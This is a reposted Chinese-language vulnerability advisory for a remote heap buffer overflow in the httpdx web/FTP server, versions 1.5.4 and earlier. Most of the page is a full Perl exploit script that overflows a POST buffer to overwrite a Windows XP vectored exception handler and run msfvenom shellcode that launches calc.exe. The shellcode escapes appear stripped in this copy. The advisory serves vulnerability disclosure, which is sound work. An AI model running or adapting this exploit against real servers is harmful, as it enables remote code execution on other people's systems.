发布日期:2012-07-29
更新日期:2012-07-31受影响系统:
httpdx httpdx 1.5.4
httpdx httpdx 1.5.3b
httpdx httpdx 1.5.3
httpdx httpdx 1.5.2
httpdx httpdx 1.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54712httpdx是一款轻型的http和ftp服务器。 httpdx 1.5.4及之前版本在实现上存在远程堆缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用中执行任意代码。<*来源:st3n
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!st3n ()提供了如下测试方法:
#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
# where "size" is actually the value of "Content-Length" HTTP header..
# All post-data will then be copied into this area using strncpy(x,y,size2),
# where "size2" = "request length" - "header length" (and not Content-Length)
#
# - As httpdx use it own handler function upon crash, this exploit overwrite
# the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In both case, httpdx crash
# after the exploit.
#
# - WinXP SP1
# 0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================
use strict;
use IO::Socket::INET;
# target
my $host = "127.0.0.1";# The [perl|php|py|..] page to call during the POST request.
# The page must exists and the extension must be defined in the directive
# "http.handlers = {...}" in httpdx.conf
my $page = "/test.pl";
# Windows XP - SP1 - English
# ---------------------------
# ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c ;# pointer to out shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;
# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52" .
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26" .
"x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d" .
"x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0" .
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" .
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff" .
"x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d" .
"xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b" .
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44" .
"x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b" .
"x12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68" .
"x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95" .
"xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb" .
"x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2e" .
"x65x78x65x00";
# flush after every write
$| = 1;my $sock = IO::Socket::INET->new("$host:80");print $sock "POST $page HTTP/1.0
" .
"Content-Length: 1023
" .
"Content-Type: text
" .
"Host: $host" . "
" .
"
" .
# shellcode
$shellcode .
# nops
"x90" x (1032-length($shellcode)) .
# VEH addr
pack("V", $veh_node_addr) .
# ptr to shellcode
pack("V", $sc_ptr)
;
# if any ...
while(<$sock>){
print $_;
}
exit;建议:
--------------------------------------------------------------------------------
厂商补丁:httpdx
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://httpdx.sourceforge.net/Sysax Multi Server函数缓冲区溢出漏洞Libxml2多个整数溢出漏洞相关资讯 堆缓冲区溢出漏洞 httpdx
- Microchip TCP/IP Stack 堆缓冲区 (05/04/2013 07:08:14)
- Opera Web浏览器缓冲区溢出和信息 (11/22/2012 06:44:01)
- IcedTea-Web堆缓冲区溢出漏洞(CVE- (11/10/2012 13:45:23)
| - grep整数溢出堆缓冲区溢出漏洞 (12/27/2012 08:24:54)
- Novell File Reporter "NFRAgent. (11/19/2012 19:18:06)
- LibTIFF "TIFFScanlineSize()"函数 (11/06/2012 08:51:02)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站